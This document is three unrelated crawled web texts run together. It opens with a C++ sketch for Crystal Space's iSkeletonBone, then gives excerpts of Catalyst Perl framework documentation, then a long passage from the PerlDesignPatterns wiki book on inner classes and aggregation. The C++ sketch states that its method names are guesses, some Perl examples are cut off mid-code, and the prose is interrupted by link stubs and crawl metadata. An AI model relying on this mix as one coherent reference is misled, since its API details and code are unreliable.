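A short usage sketch based on the member briefs above. The exact member names did not survive on this page, so the ones below (SetName, SetParent, SetTransform, FindChild) are assumptions inferred from the briefs; check imesh/skeleton.h for the real signatures before using:

#include <csgeom/transfrm.h>   // csReversibleTransform
#include <imesh/skeleton.h>

// Hypothetical: wire up a small two-bone chain using the accessors
// suggested by the briefs above.
void SetupArm (iSkeletonBone* upper, iSkeletonBone* lower)
{
  upper->SetName ("upper_arm");
  lower->SetName ("lower_arm");
  lower->SetParent (upper);                  // "Set parent bone."

  csReversibleTransform offset;              // identity transform
  lower->SetTransform (offset);              // "Set transform of the bone in parent's coordsys."

  iSkeletonBone* child = upper->FindChild ("lower_arm");
  (void) child;                              // "Find child bone by name."
}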
http://www.crystalspace3d.org/docs/online/api-1.0/structiSkeletonBone.html
CC-MAIN-2016-30
en
refinedweb
Catalyst - The Elegant MVC Web Application Framework

See the Catalyst::Manual distribution for comprehensive documentation and tutorials.

    # Install Catalyst::Devel for helpers and other development tools
    # use the helper to create a new application
    catalyst.pl MyApp

    # add models, views, controllers
    script/myapp_create.pl model MyDatabase DBIC::Schema create=dynamic

-Debug: Enables debug output. You can also force this setting from the system environment with CATALYST_DEBUG or <MYAPP>_DEBUG. The environment settings override the application, with <MYAPP>_DEBUG having the highest priority.

-Log: Specifies log level.

-Stats: Enables statistics collection and reporting. You can also force this setting from the system environment with CATALYST_STATS or <MYAPP>_STATS. The environment settings override the application, with <MYAPP>_STATS having the highest priority. e.g. use Catalyst qw/-Stats=1/

$c->request: Returns the current Catalyst::Request object, giving access to information about the current client request (including parameters, cookies, HTTP headers, etc.). See Catalyst::Request.

$c->forward: Forwards processing to another action, e.g.

    $c->forward(qw/MyApp::Model::DBIC::Foo do_stuff/);
    $c->forward('MyApp::View::TT');

Note that forward implies an eval { } around the call (actually execute does), thus de-fatalizing all 'dies' within the called action. If you want die to propagate you need to do something like:

    $c->forward('foo');
    die $c->error if $c->error;

Or make sure to always return true values from your actions and write your code like this:

    $c->forward('foo') || return;

$c->detach: The same as forward, but doesn't return to the previous action when processing is finished. When called with no arguments it escapes the processing chain entirely.

$c->controller($name): Gets a Catalyst::Controller instance by name.

    $c->controller('Foo')->do_stuff;

If the name is omitted, will return the controller for the dispatched action.

$c->controllers: Returns the available names which can be passed to $c->controller.

$c->models: Returns the available names which can be passed to $c->model.

$c->views: Returns the available names which can be passed to $c->view.

$c->component($name): Gets a component object by name. This method is not recommended, unless you want to get a specific component by full class. $c->controller, $c->model, and $c->view should be used instead.

$c->uri_for( $path, @args?, \%query_values? ): Merges path with $c->request->base for absolute URIs and with $c->namespace for relative URIs, then returns a normalized URI object. If any args are passed, they are added at the end of the path. If the last argument to uri_for is a hash reference, it is assumed to contain GET parameter key/value pairs, which will be appended to the URI in standard fashion. Instead of $path, you can also optionally pass a $action object which will be resolved to a path using $c->dispatcher->uri_for_action; if the first element of @args is an arrayref it is treated as a list of captures to be passed to uri_for_action.

$c->welcome_message: Returns the Catalyst welcome HTML page.

INTERNAL METHODS: These methods are not meant to be used by end users.

$c->dispatch: Dispatches a request to actions. See Catalyst::Dispatcher.

$c->prepare_body: Prepares message body.

$c->prepare_body_chunk: Prepares a chunk of data before sending it to HTTP::Body.

$c->read: Reads from the request body. See Catalyst::Engine. Warning: If you use read(), Catalyst will not process the body, so you will not be able to access POST parameters or file uploads via $c->request. You must handle all body parsing yourself.

$c->run: Starts the engine.

$c->set_action: Sets an action in a given namespace.

$c->setup_actions: Sets up actions for a component.

$c->setup_components: Sets up components. Specify a setup_components config option to pass additional options directly to Module::Pluggable. To add additional search paths, specify a key named search_extra as an array reference. Items in the array beginning with :: will have the application class name prepended to them.

$c->setup_dispatcher: Sets up dispatcher.

$c->setup_engine: Sets up engine.
$c->setup_home: Sets up the home directory.

$c->setup_log: Sets up log.

$c->setup_plugins: Sets up plugins.

$c->setup_stats: Sets up timing statistics class.

$c->stack: Returns an arrayref of the internal execution stack (actions that are currently executing).

$c->stats_class: Returns or sets the stats (timing statistics) class.

$c->use_stats: Returns 1 when stats collection is enabled. Stats collection is enabled when the -Stats option is set, debug is on, or when the <MYAPP>_STATS environment variable is set. Note that this is a static method, not an accessor, and should be overloaded by declaring "sub use_stats { 1 }" in your MyApp.pm, not by calling $c->use_stats(1).

CONTRIBUTORS: Carl Franks, Christian Hansen, Christopher Hicks, Dan Sully, Danijel Milicevic, David Kamholz, David Naughton, Drew Taylor, Sebastian Willert.
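A small controller sketch exercising the API documented above. The class, action, and paths are illustrative, not from the Catalyst distribution:

    package MyApp::Controller::Books;
    use strict;
    use warnings;
    use base 'Catalyst::Controller';

    sub list : Local {
        my ($self, $c) = @_;

        # Catalyst::Request gives access to query parameters
        my $page = $c->request->param('page') || 1;

        # forward() de-fatalizes dies, so check for errors as shown above
        $c->forward(qw/MyApp::Model::DBIC::Foo do_stuff/);
        die $c->error if $c->error;

        # a trailing hashref becomes the query string,
        # e.g. http://localhost:3000/books/list?page=2
        my $next = $c->uri_for('/books/list', { page => $page + 1 });
        $c->response->body("next page at $next");
    }

    1;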
http://search.cpan.org/~mramberg/Catalyst-Runtime-5.7012/lib/Catalyst.pm
crawl-002
en
refinedweb
Object::PerlDesignPatterns - Perl architecture for structuring and refactoring large programs

  lynx perldesignpatterns.html
  perldoc Object::PerlDesignPatterns

Documentation: Ideas for keeping programs fun to hack on even after they grow large. Object, lambda, hybrid structures, Perl-specific methods of refactoring, object tricks, anti-patterns, non-structural recurring code patterns.

PerlDesignPatterns is a free book sporting: ideas for keeping programs fun to hack on even after they grow large; object, lambda, and hybrid structures; Perl-specific methods of refactoring; object tricks; anti-patterns; non-structural recurring code patterns.

Feel free to jump right in and make corrections, suggestions, ask questions, play editor, or just rant. Start in to learn about the TinyWiki software, make a page for yourself, play with editing that, perhaps make a link from the GuestLog to your page. The markup language is ASCII based - it couldn't be any easier.

This document is a snapshot of the current state of the Wiki, automatically compiled from hundreds of individual sections by a Perl script. To cause my poor old server to prepare an up-to-the-minute HTML version of this document, go to.

My text hasn't been proofread or spellchecked, with few exceptions. My code hasn't been tested by other people, and has only been tested by myself in a few cases. Since this project is (at least partially) out of my hands, there is no firm point at which it's finished: the scope is indefinite. Because of this, parts of the document will always be in rough shape, contain inconsistencies, and so on.

The PerlDoc version is compiled by podparser.pl, at, from hundreds of little text files. These text files use TinyWiki's markup. This simple ASCII format translates well to HTML. Things are lost in the translation to PerlDoc, still. Also, the pod2html that comes with Perl doesn't like to create forward links. The HTML translator loses the leading two underscores on meta-identifiers such as underscore-underscore-PACKAGE-underscore-underscore, and the PerlDoc parser probably does too. I cannot find the way to escape ?'s in POD link tags so that pod2html won't mangle them.

Scott Walters - [email protected]

PerlDesignPatterns

Scott Walters - [email protected]

"PerlDesignPatterns" in PerlDesignPatterns is a free on-line book and forum. For information about this project and links to download the entire book, see "HomePage" in HomePage, or just click - Downloading is highly recommended unless you're contributing to the project. Wget users - fetch "TinyWiki" in TinyWiki:download.cgi instead, and see "HomePage" in HomePage for more info.

Novices, intermediate programmers: "Object Nuts and Bolts" is for you. Scroll down.

Introduction
Object Adapter Design Patterns

Experts and advanced programmers: start here.

Object State Patterns
Object Creational Patterns
Object Structure Patterns
Object, Lambda Hybrid Patterns
Relational Data Patterns
Non-Object Patterns
Application Features
Web:
General:
Anti-Patterns
Refactoring Concepts
Object Nuts and Bolts

Object novices: start here.

Appendices
Other Concepts and Blurbs, Or As Of Yet Unclassified
Meta

All content on this server is copyright 2002, 2003 by "ScottWalters" in ScottWalters, unless otherwise noted. Content credited otherwise is copyright its original author and has been generously made available by them under the same terms as the rest of the project, the "GnuFreeDocumentationLicense" in GnuFreeDocumentationLicense.

Member of "CategoryBook" in CategoryBook.
hits since Wed Oct 9 00:20:05 PDT 2002

$Id: "PerlDesignPatterns" in PerlDesignPatterns,v 1.225 2003/06/21 00:30:04 httpd Exp $

External Pages Linking to This Page - this is generated automatically - thanks to everyone linking here:

Welcome to "TinyWiki" in TinyWiki, the "PerlDesignPatterns" in PerlDesignPatterns repository! Here, CPAN's Object::PerlDesignPatterns (PerlDesignPatterns) is crafted by you and me. "PerlDesignPatterns" in PerlDesignPatterns is a free online book, forum, and documentation project.

Quick start: Browse or download.

News

Download PerlDesignPatterns

TinyWiki

PerlDesignPatterns Development and Forum

Browsing the Wiki confuses mere mortals. Grab instead for casual reading.

Also Also Wik

"We are now the Knights who say ... Wiki wiki wiki wiki, bih-kang, zoop-boing, zowenzum" - I've been dying to say that ;) - Kurt, quoting

What in the Heck?

There is no master site map: this site is itself a web. Some recommended starting points are: "CategoryBook" in CategoryBook, "PerlPatternsResources" in PerlPatternsResources.

Why are all the words of all of the links run together? Because that's how you make links! Words written this way get turned into links. Linking to an unknown page creates a new page. See "TinyWiki" in TinyWiki for a jumpstart. started this madness with his original at.

Feel free to edit pages to make corrections, improvements, editorial comments, ask questions, and so on. Someone will see your changes in and answer your questions or touch up your work. Wikis exist to discuss all topics: see for a few others. This site is a tool for collaboration on the "PerlDesignPatterns" in PerlDesignPatterns project. Discussion of Wiki technology, Perl, OO programming in general, and language theory are on topic. You're encouraged to make a page named after yourself (for example, "ScottWalters" in ScottWalters is mine) and link to it off the "GuestLog" in GuestLog - yours need not be on topic. Off-topic text not on yours is likely to be moved there or pruned, not because we don't think it's funny, merely because focus is important. See.

Have Fun! - ScottWalters

$Id: "HomePage" in HomePage,v 1.156 2003/06/21 07:57:24 httpd Exp $

Pages Linking to This Page:

What?

A Wiki-style user-editable online area, written in under a hundred lines of Perl. The code is available: see below. In a nutshell, click the graphic on the top of the screen to get back to the "HomePage" in HomePage from anywhere. Feel free to edit pages. Play around in the if you want to experiment, then make a "GuestLog" in GuestLog entry. To create a new page: See and for more information on Wiki and other Wiki codebases, or keep reading for more about "TinyWiki" in TinyWiki. has links to historic versions and versions unburdened by all of my local parser rules.

How?

How did I write a Wiki in under 100 lines? Not exactly on par with, but I wrote compact code, did the, and most of all, didn't make any arrangements for modularity, resigning myself to refactor constantly. You could say "TinyWiki" in TinyWiki is a study in constant refactoring. This version saves documents to CVS, but does tolerate not having it. See Features below to learn what is available in the way of formatting text, then play with editing in. has a very nice quick reference for "TinyWiki" in TinyWiki formatting.

Why?

Why another Wiki? Because the free Wiki clone I had been using was 4,000 lines long, which is about 3,900 too many. It took ages to load.
It was tied to the goofy .dbm format so I couldn't easily write scripts to import/export. Wanted something easy to hack on. See.

Who?

"ScottWalters" in ScottWalters. Just another perl hacker. See for more.

Where?

Each script is capable of spitting out its own source code. Think of it as human-assisted-propagation. Want to practise software husbandry? Be advised - in the spirit of tininess, important things are missing. There is currently no HTML filtering, so users could create obnoxious pages, etc. has different text processing rules - I didn't find 's intuitive. Sorry. Pages can not be completely deleted - that would interfere with fetching previous versions, and a philosophy exists that web pages should never just vanish, but should instead be replaced with a page linking to where the content moved. In the spirit of, I firmly hold true the notion that it is more important to be able to hack features on than to have every conceivable feature, simply because every feature isn't conceivable, and attempts to conceive of them litter the code with thousands of attempts, almost all of which miss the mark. To the degree that it's possible, new features are implemented as separate scripts. I want to push the limit of what is possible. With the advent of, most features are being implemented as code buried in pages. Some auxiliary scripts may be converted to.

Features:

Auxiliary Scripts

ActiveWikiPages Features

Misc

Todo:

Install Notes

See for some notes on installing this software.

Thanks To

"TinyWiki" in TinyWiki uses code from in fogindex.cgi, code from and from Moogle Stuffy Software in diff.cgi, with bug fixes and contributions in wiki.cgi from and other people whose names I hope I remember soon... oops.

The little graphic is meant to be tiled. See for more about them. Hint: It's a plot of an x, y function.

See Also: "GuestLog" in GuestLog

$Id: "TinyWiki" in TinyWiki,v 1.266 2003/06/22 05:58:43 httpd Exp $

Pages Linking to This Page:

Software, like all things, has quality. Which scenarios describe the projects you've worked on? Which of these are familiar? Which have you overcome through experience?

1. Works when no one is watching

When the requirements are completely out of control, many programmers celebrate even having reached this point.

2. Works if you do it just right

Too many applications, most not written in Perl, make it to this point and stop cold. Forget reusable, this isn't even usable.

3. Trying most things once, it doesn't break

You may be tempted to give a software demo in front of a crowded auditorium at this point. Don't.

4. Other people tried it, and it seems to work

Software released to the community often starts at this point. Before this point, there isn't enough benefit for it to be worthwhile for them to fix your bugs.

5. Been in production for a while, and you're running out of bugs to fix

Most Perl programs quickly shoot to level 5, and stop. Level 5 is a good level. Since it's really about the users, not the developers, Perl has traditionally been great for end users.

6. Other programmers are adding to it, so you made the code understandable

Other programs can incorporate this program into theirs, or vice versa, and benefit from your work.
7. A lot of people are working on it, so you made it modular and well laid out logically

Resistant to damage caused by new features, different requirements, and new programmers. In a lot of ways, like a Spider Plant: fractal, prolific, and cute.

8. It has turned into a generic framework for doing things of this kind, and has been separated from early assumptions

Different products that do the same thing - but better, or differently - can easily be created based on this class.

9. Hordes of the nit-pickiest people on the net have picked every last nit out of it

College classes are dedicated to exploring your code. Aspiring programmers marvel at the sheer beauty of it.

Most programmers are smart and hard working. Things go wrong mysteriously. Changing requirements stress the design of a program. A program at level 5 can quickly turn into a level 2 program if people start working on it who don't understand the entire design, or the original design doesn't take into account the direction it takes into the future and no one adapts the design. This is the primary reason to shoot for a level 7 program. Having net-god status thrust upon you and having to live up to it, or attempting to attain net-god status, is the primary reason to shoot for level 9. Of course, if the program is a few lines long, none of this amounts to a hill of beans.

Software does not wear out in the traditional sense of machinery with moving parts. However, software is constantly being used in ways its authors never expected (often uncovering errors), and end users are constantly demanding extensions to their software. -

Because we don't know how programs will reinvent themselves, we don't know how to design an "Interface" [1], what composite types are involved, and what containment and inheritance hierarchies will look like. In the beginning, we seldom know that a program will grow into this at all! Perl's easy-going attitude and powerful features shine here. After a program has devised a solution to a logic problem, and after it has proved its continued usefulness, we have a route for improvement. That's about all there is to it.

Now you need just to go off and buy a book about object-oriented design methodology, and bang your forehead with it for the next six months or so. - "PerlDoc" in PerlDoc:perlobj

Objects allow arbitrary arrangements of useful logic. This enables software to scale, and to exhibit flexibility within its development cycle and within the life of a single invocation. Implementations of different facilities can be swapped out not only during development, but while the program is running.

Objects don't help you finish a boring program quicker. They don't help much with diddling with a bit of code until it works. They don't magically make your programs maintainable and extensible. Many Perl programmers happily blast OO. I believe every idea has its time and place. Clearly, small scripts aren't the place for OO, and before the code is even working isn't the time. Knowing when and how to use OO means knowing how to benefit from it without it getting in the way.

Conventional wisdom says that you can't graft objects onto an existing design. Perhaps you're already a Perl fan because it lets you break rules. This is one that needs breaking. In Perl, you can indeed bless [2] an existing datastructure into object-hood.

Graphical User Interfaces [3] proved the value of Object Oriented programming: see.
Everything that gets drawn on your screen shares a few similarities: it has an appearance that only it knows how to draw. It can sit inside of another object, as menus can be in title bars and buttons can be in windows. It can send messages when activated to other objects which control the behavior of the application. Versions of components customized for appearance or behavior could easily be created, extending existing code. Taking advantage of these similarities allowed graphical elements to be mixed and matched, and allowed the application to treat similar elements in the same way. It also allowed complex structures to be arranged at run time and continuously revised as the user moved things around on the screen and opened windows. The possibilities are built in rather than the limits.

The gospel spilled out. Large applications and operating systems adopted the tenets. Web programming adopted it after a rash of horrible overgrown "scripts" mostly written by Perl programmers.

Software Engineering has traditionally meant applying the right algorithm for the job. Most University educations focus on understanding algorithms. This is important, and, O'Reilly Press, is good reading on the topic. Attention to the overall structure of the program, how the algorithms fit together, and building software with (at least the appearance of) a grand design is the trendy new wave. With this in mind, let's think of Objects as tools, just like any other Perl shortcut or magic. Remember - There is More Than One Way To Do It.

See Also:

Object-oriented programming books tell you what an OO program looks like, and all of the benefits of writing code in this style. Too often, they don't tell you how to arrive at this ideal. The result has been large amounts of code that use OO features, but miss the boat on benefitting from them. Since we're using them strictly for fun and profit, we're going to concentrate on the exact utility of each idea, and when it is useful to apply it.

"DesignPatterns" are parables of good software design. Good parables have a cast of evil creatures, good creatures, and a moral. The follies of evil become evident. Lessons are learned. Sometimes, the evil creatures aren't killed, but change their ways. They represent an ideal, explain the ideal, and give a path, all in neat little case studies. Think of it as your software bible.

"DesignPatternsElementsOfReusableSoftwareComponents" brought design patterns to computer science. When it did, it talked about OO constructs exclusively. Since Perl programs combine many other ideas, we're going to extend the concept. Objects are data attached to code; "LambdaClosures" are code attached to data. "Exporting" lets one module alter the world of another. Usually this means adding keywords, but there are few limits. Perl's introspective capabilities open up a new area of investigation. Perl is multi-paradigmatic, and we should be too. XXX

I apologize for the length of this letter, for I lacked the time to make it shorter. -- Blaise Pascal

Are Design Patterns worth it? Programmers freshly exposed to Design Patterns start building Winchester mansions [4]. The creations themselves could likewise be said to be garish curiosities, Victorian in their own right. The same disease has been noted in programmers first exposed to the style of Scheme and programmers first exposed to OO programming. Creatively applying design patterns to a problem quickly degenerates into creatively making everything an object. Soon every variable, operator, condition, state, state transition, record, and connection is an object. Don't laugh.
I've read serious texts that have turned state transitions into objects [5]. There is a difference between building an abstraction and abstract building. I'd have to answer the question "no" for most programmers: they aren't worth it. On the other hand, most programmers don't program Perl. Perl programmers already have well-ventilated feet.

To me, reading OO code is often like reading Atari BASIC (or any other non-procedural BASIC, for that matter). Finding out where values come from is a riddle. Names of objects and constructor prototypes give hints about how things are arranged, which let you wager a guess about where a value probably should come from, which is sometimes where it does come from. The code is a web, and values tend to travel pretty darn far across it. On the other hand, in BASIC, important constants are near the top. I think BASIC wins this one. BASIC programs were proud of their constants: the fact that they were made into variables instead of repeated hardcodes, and placed at the top of the file, let them proudly display them as the easy-to-change options they are. In OO programming style, something is either adjusted with a GUI preferences screen, or it's a shameful bit of post-war relic. The bad news is that in order to be cleansed of all sin in this nihilist religion, you need an infinite number of config screens to keep up with the growing number of options of the growing program: there is no upper bound and no end to this race [6]. At some point, things break down, and some foundation must be hardcoded, somewhere. The gentle art of bootstrapping, non-GUI-editable config files, and compile-time preferences have an enduring place in software. Likewise, the brakes need to be put on OO. Perl programs haven't reached this level of garishness yet. Perl is a humble language, as says, so with some ties to our roots, perspective, and frequent trips to the confessional, it may never become garish. Let's hope.

Systems of Object relationships should never create more complexity than they clear up. This is an important and powerful motive to stop OO-ifying a program at a certain point. OO-ifying a program should make the program shorter, more readable, easier to prototype, cleaner, more robust - everything that OO zealots promised. If it doesn't, it isn't a fault of OO or the OO zealots; it's your fault - you've gone too far.

An important tip of the hat to M. J. Dominus goes here. His "'Design Patterns' Aren't" lightning talk voiced some latent objections I couldn't quite formulate.

Christopher Alexander, author of A Pattern Language, conceived of design patterns for architecture. His book doesn't tell you what to build, nor how to build it. To quote M. J. Dominus, //The problem Alexander is trying to solve is: How can you distribute responsibility for design through all levels of a large hierarchy, while still maintaining consistency and harmony of overall design?// Convention and communication are key, especially since convention in Perl is purely voluntary. Alexander's book is concerned with the level immediately above and immediately below yours, in addition to what you're doing. To think of space being distributed not only according to boundaries but according to delegation and impact is novel. When designing a city, planning for neighborhoods, public transportation, and intertwined natural areas are smaller scale architectural elements. When designing a school, park, or housing community, they are larger, encompassing architectural elements.
Designing a nice whatever is important, but fitting it into the surrounding picture, at the same time thinking of the people who will pick up your work where you leave it, is paramount. This cuts deeper to the heart of encapsulation and delegation than any single programming technique.

Architecture is often seen as a luxury or a frill, or the indulgent pursuit of lily-gilding compulsives who have no concern for the bottom line. -- Pattern Language of Program Design IV

Architects know how to design skylights, and they delegate the actual construction of architectural objects to qualified builders. The primary job of the architect is a creative one: designing something functional that uses standard elements to create custom solutions for unanticipated specifications. This is remarkably similar to the plight of the programmer, barring one difference: programmers have to do the construction themselves. Being bogged down in this labor-intensive discipline can suck time away from contemplating the bigger picture. The mention of a skylight makes an architect giddy as he visualizes the light playing across the open spaces. The mention of a skylight makes a builder sigh as he ponders reinforcing the roof, hanging drywall in the roof, and more trim work. Not only can being bogged down in this level of detail keep programmers from appreciating architectural elements of software, it can keep them from learning about them at all. If that isn't enough, only recently was any effort made to catalog them. To top it all off, clients don't ask for architecturally sound software: they ask for huge amounts of square footage decorated with endless amounts of cheap facade. Design is cast away as an inconvenient nuisance that limits how much software can be churned out how fast.

Architects are judged by the quality of their work. Programmers are judged by the quantity of their work. Architects design stable structures, but they also creatively ply their craft to devise ways to make their customers value the structure more. The structures that pass the test of time are not only the most solid ones, but the most innovative, imaginative, inspirational, and useful. That being said, it's important to decide what to build, and how to build it, on your own. It is also important to know what is available to build, and the techniques available to do so. Being the designer-constructor, you have to pay your own price for your design errors.

Programmers are, in their hearts, architects, and the first thing they want to do when they get to a site is to bulldoze the place flat and build something grand. -

External Pages Linking to This Page:

Eventually you wind up with libraries that are more trouble to reuse than rewrite from scratch -.

OO isn't real, in the sense that it's an idea. There are seldom litmus tests for the presence of ideas. It isn't a feature of a language that makes your program better. Instead, it is a collection of ideas, and facilities in the language, to apply these ideas. I won't ever discuss whether or not a language is an OO language. Early C++ compilers compiled C++ down to C and fed it to a C compiler. This doesn't make C++ any less OO. In fact, no matter what the language and its basic premises, they all run on the same computers and compile down to the same languages that computer processors can understand.

As with anything that is built up too much, results fall short of expectations. While many people are avid believers in OO, others are quick to point out cases where it does more harm than good.
Before we do anything else, let's look at exactly what OO is, and what it isn't. A good, hard, honest evaluation will set reasonable expectations. Reasonable expectations will keep everyone happy.

Making the program do its own checking frees you from much of the debugging work. See "TypeSafety" in TypeSafety, "DesignContract" in DesignContract.

It needn't be. Perl is an idiomatic language and shouldn't change to suit OO's style. See.

We begin with the part of the language which defines a town or a community. - A Pattern Language

NP-complete problems take an exponential amount of time, relative to the amount of input, to complete. Calling something "NP Complete" describes it as a problem not worth trying to solve, or only trying to solve in a very approximate fashion. See.

Contrived interfaces result from arrogantly believing that every aspect of the design of the program can be anticipated. This is akin to playing out a game of chess without touching a piece. All of the decision making in the world won't do a bit of good if it doesn't take reality into account, and reality requires constant probing to understand.

Every program can be reduced by one instruction, and every program has at least one bug. Therefore, any program can be reduced to one instruction which doesn't work. -- Unknown

XXX OO has been marketed as making planning easy. Planning without feedback is easy but useless. Planning with hypothetical feedback is both difficult and useless. I propose that planning to make design changes is far more important than any other planning you will do. Knowing when and how to restructure code applies equally to procedural and OO code. OO discipline only helps make the process easier. No feedback means no quality in what you do.

A project without a prototype is like a candle without a wick. -

No feedback means no opportunity for improvement. Old timers blame the disappearance of punch cards for the deterioration in software quality [7]. Using punch cards forces you to stop and think things through. Interactive programming lets you guess your way through, often never really understanding the situation. A language that makes you be explicit about your intentions in great detail is a throwback to punch cards, in a way. Guessing has its place in sounding out theories (and passing exams). Having a compiler that can give you critical feedback may be a good trade-off. Not having a product means no feedback - no feedback from the compiler, or from sounding out the design. The only constant is change.

An assault on large problems employs a succession of programs, most of which spring into existence en route. These programs are rife with issues that appear to be particular to the problem at hand. -- Alan J. Perlis, Foreword,

When asked what the most important tools of an architect are, replied, The eraser in the drafting room and the sledgehammer at the construction site. Good design comes from bad design eventually, if you learn from your mistakes. This may be the only software engineering manual that doesn't beg and plead with you to "do it right the first time". You have to pick your battles though: for any program, some problems are design flaws, some are design trade-offs. How do you "fix" a trade-off?

See Also: "AboutTheAuthor" in AboutTheAuthor, "AboutObjects" in AboutObjects

<!-- <|dave|> you're right. OO can be useful. but the thing is, it gets forced down our throats
> feel free to edit any page. there is a little "edit" link in the bottom left corner.
<|dave|> everyone tries to bend a project to make it OO <|dave|> when some of them just arent suited to OO <uri> |dave|: i didn't force it down my throat. i designed with it and not against it. my project needed polymorphism and OO perl does that. <|dave|> few projects suit OO <uri> |dave|: wrong. some do. <uri> many do. <|dave|> < 50% <uri> but many projects are poorly architected in any paradigm > |dave| - there was an idea that modeling the project using OO/usecase etc would make the program scalable. that never happened. that failed horribly. not only cna't you plan for something that complex, but throwing objets in the mix doesn't help at all. <uri> architecture is key. that is shitty all over > objects are much better used to clean up existing code incrementally than try to avoid the np-complete problem of predicting the future <uri> scrottie: same there. architecture is key. always will be. <uri> architecture is not OO. it is making a coherent whole out of parts > learning as you go is key. constant injetions of architecture rather than a poorly planned attempt up front is key. <uri> no one does architecture at all. <|dave|> when i look at OO code, i just cant stand it. so much overhead.... people work in micoarchitecture making so many tiny little improvements to squeeze as much performance as possible out of a computer, then people f*ck it away using OO <uri> |dave|: you haven't seen good OO code then. > |dave| - trying to delegate everything "just in case" makes a special kind of speghetti code. you can't figure out the flow of the program, how things are constructed, where values come from - because it is so indirect <uri> rare but good OO code makes sense. > good OO code has abstraction removed as often as it has it added, and people hiding behind OO to make their code good aren't willing to do that <|dave|> what do you mean scrottie <|dave|> about "just in case" i mean > if a constructor gets called, and you have to dig through 30 different constructor calls, methods, delegations, etc to figure out where the hell the values came from, something is wrong > oh > people add a lot of delegation and abstraction "just in case it might be useful" to keeping things modular > which, as it turns out, is a complete rat race. it is impossible to add enough abstraction up front to have the exact right abstraction you end up needing <|dave|> yeah > then, they refuse to remove any of it > leaving a tangled web as bad as any speghetti code > spaghetti? i can't spell <|dave|> right on > PerlDesignPatterns tries to expose aspiring OO programmers to as many *other* ideas as possible <|dave|> one reason im anti-OO is that someone has to be --> External Pages Linking to This Page: Synopsis: Related packages can be created where they are defined. When: Adding another Interface to an object, passing out callbacks, creating helper objects. Moving inheritance, or interfaces, out of your object but not far from it.(); } # there should be two underscores on either side of PACKAGE. TinyWiki is having a bug. sorry. WebsafeColors::Iterator ( Iterator) implements all of the functions required to be an instance of Iterator. If something takes an argument, and insists it implement Iterator, it will accept the result of calling getIterator() on a object. However, itself does not implement these methods, or inherit the base abstract class for Iterators. The package that does is contained entirely inside's getIterator() method. 
This technique lets you localize the impact of having to provide an interface, and keep code related to supporting that interface together and away from the rest of the code. This supports the basic idea of putting code where it belongs. When we return a WebsafeColors::Iterator ( Iterator) object, that object uses a variable defined lexically inside. Since defined lexically (contained inside the block, in this case, the method) to the variable $parentThis, we hold a reference to it. If it changes, we see the changes. If the parent is destroyed before the WebsafeColors::Iterator ( Iterator) object we return is, this variable will live on until all references are destroyed. This way, we can share data efficiently with our parent. In some situations, it may be better to copy the data before giving it to the inner class, or to use Immutable Objects, explained in Chapter XXX. Our Perl implementation could cause problems if two threads contend for the same datastructure, even by way of different objects. Thus, if used in a threading environment, the and all of its returned inner classes would need to synchronize on the same object for access to the array of colors. Failure to do so would lead to iterators that miss colors, end prematurely, or overrun the array. "BiDirectionalRelationshipToUnidirectional" in BiDirectionalRelationshipToUnidirectional talks about how "InnerClasses" in InnerClasses may be employed to cleanly build structures of mutually referring objects. "AdapterPattern" in AdapterPattern is similar to "InnerClasses" in InnerClasses, but the adapter has no access to lexical data, and sits in a seperate file. Adapters can be (and usually are) added after the fact, and have the advantage of not requiring tampering with a class to implement. "CurryingConcept" in CurryingConcept talks about creating method-level wrappers to serve as adapters. An "IteratorInterface" in IteratorInterface is a good use of "InnerClasses" in InnerClasses. Interfaces clutter up a namespace with lots of methods designed to present the data and logic in an object is various ways. The "IteratorInterface" in IteratorInterface encapsulates the requirements, keeping things as neat as possible.,, See Also External Pages Linking to This Page: Members of a common subclass are each known to have certain methods - that is, they all implement a given interface. These methods return information about the state of that perticular object, or make changes to its state. It does happen that an application is concerned with an aggregation, or an amalgamation, of data from several object of the same type. This leads to code being repeated around the program: my $subtotal; foreach my $item (@cart) { $subtotal += $item->query_price(); } my $weight; foreach my $item (@cart) { $weight += $item->query_weight(); } # and so on Representing individual objects, when the application is concerned about the general state of several objects, is an. This is a common mismatch: programmers feel obligated to model the world in minute detail then are pressed with the problem of giving it all a high level interface. "LayeringPattern" in LayeringPattern tells us to employ increasing levels of abstraction. Create an object as a wrapper, using the same API as the objects being aggregated. Speak of objects in terms of the required interface - see "AbstractClass" in AbstractClass. This means using a common type as an entry, but allow the container to hold other that subclass it or imlpement it as an interface. 
Define its accessors to return aggregate information on the objects it contains.

package Cart::Basket;

use base 'Cart::Item';

sub add_item {
    my $self = shift;
    my $item = shift;
    $item->isa('Cart::Item') or die;
    push @{ $self->{contents} }, $item;   # autovivifies the list on first use
    return 1;
}

# query_ routines:

sub query_price {
    my $self = shift;
    my $subtotal;
    foreach my $item (@{ $self->{contents} || [] }) {
        $subtotal += $item->query_price();
    }
    return $subtotal;
}

sub query_weight {
    my $self = shift;
    my $weight;
    foreach my $item (@{ $self->{contents} || [] }) {
        $weight += $item->query_weight();
    }
    return $weight;
}

The aggregation logic, in this case, totalling, need only exist in this container, rather than being strewn around the entire program. Less code, fewer dependencies, more flexibility.

We have an object of base type Cart::Item that itself holds other Cart::Item objects. That makes us recursive and nestable - one basket could hold several items along with another basket, into which other items and baskets could be placed. You may or may not want to do this intentionally, but someone casually calling ->query_price() on your Cart::Basket object won't have to concern himself with this - things will just work.

This will break. Unless the advice of "AbstractRootClasses" in AbstractRootClasses is followed and different implementations of the same thing share the same interface, the basket can't confidently aggregate things. Unless the advice of "StateVsClass" in StateVsClass is heeded, "AbstractRootClasses" in AbstractRootClasses will never be achieved: the temptation to draw distinctions between classes that lack certain functions will be too strong. These distinctions run counter to "AbstractRootClasses" in AbstractRootClasses, causing segmentation and proliferation of interfaces for no good reason. This proliferation of types prevents aggregation in baskets and containers. Avoid this vicious cycle. Parrots that don't squawk are still parrots.

"IteratorInterface" in IteratorInterface blurb - aggregation is kind of like iteration in that they both present information gleaned from a number of objects through a tidy interface in one object. While "IteratorInterface" in IteratorInterface deals with each contained or known object in turn, "AggregatePattern" in AggregatePattern summarizes them in one fell swoop. "ContainerPattern" in ContainerPattern continues (duplicates) this, with more depth, more gotchas, and more references.

Categories

See Also
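A usage sketch for the basket above. Cart::Item here is a minimal stand-in (the book's real base class is not shown), and Cart::Basket is assumed to inherit its constructor from it:

package Cart::Item;
sub new { my $class = shift; bless { @_ }, $class }
sub query_price  { $_[0]->{price} }
sub query_weight { $_[0]->{weight} }

package main;
my $basket = Cart::Basket->new;   # constructor inherited from Cart::Item
$basket->add_item(Cart::Item->new(price => 9.99, weight => 1.2));
$basket->add_item(Cart::Item->new(price => 0.99, weight => 0.1));
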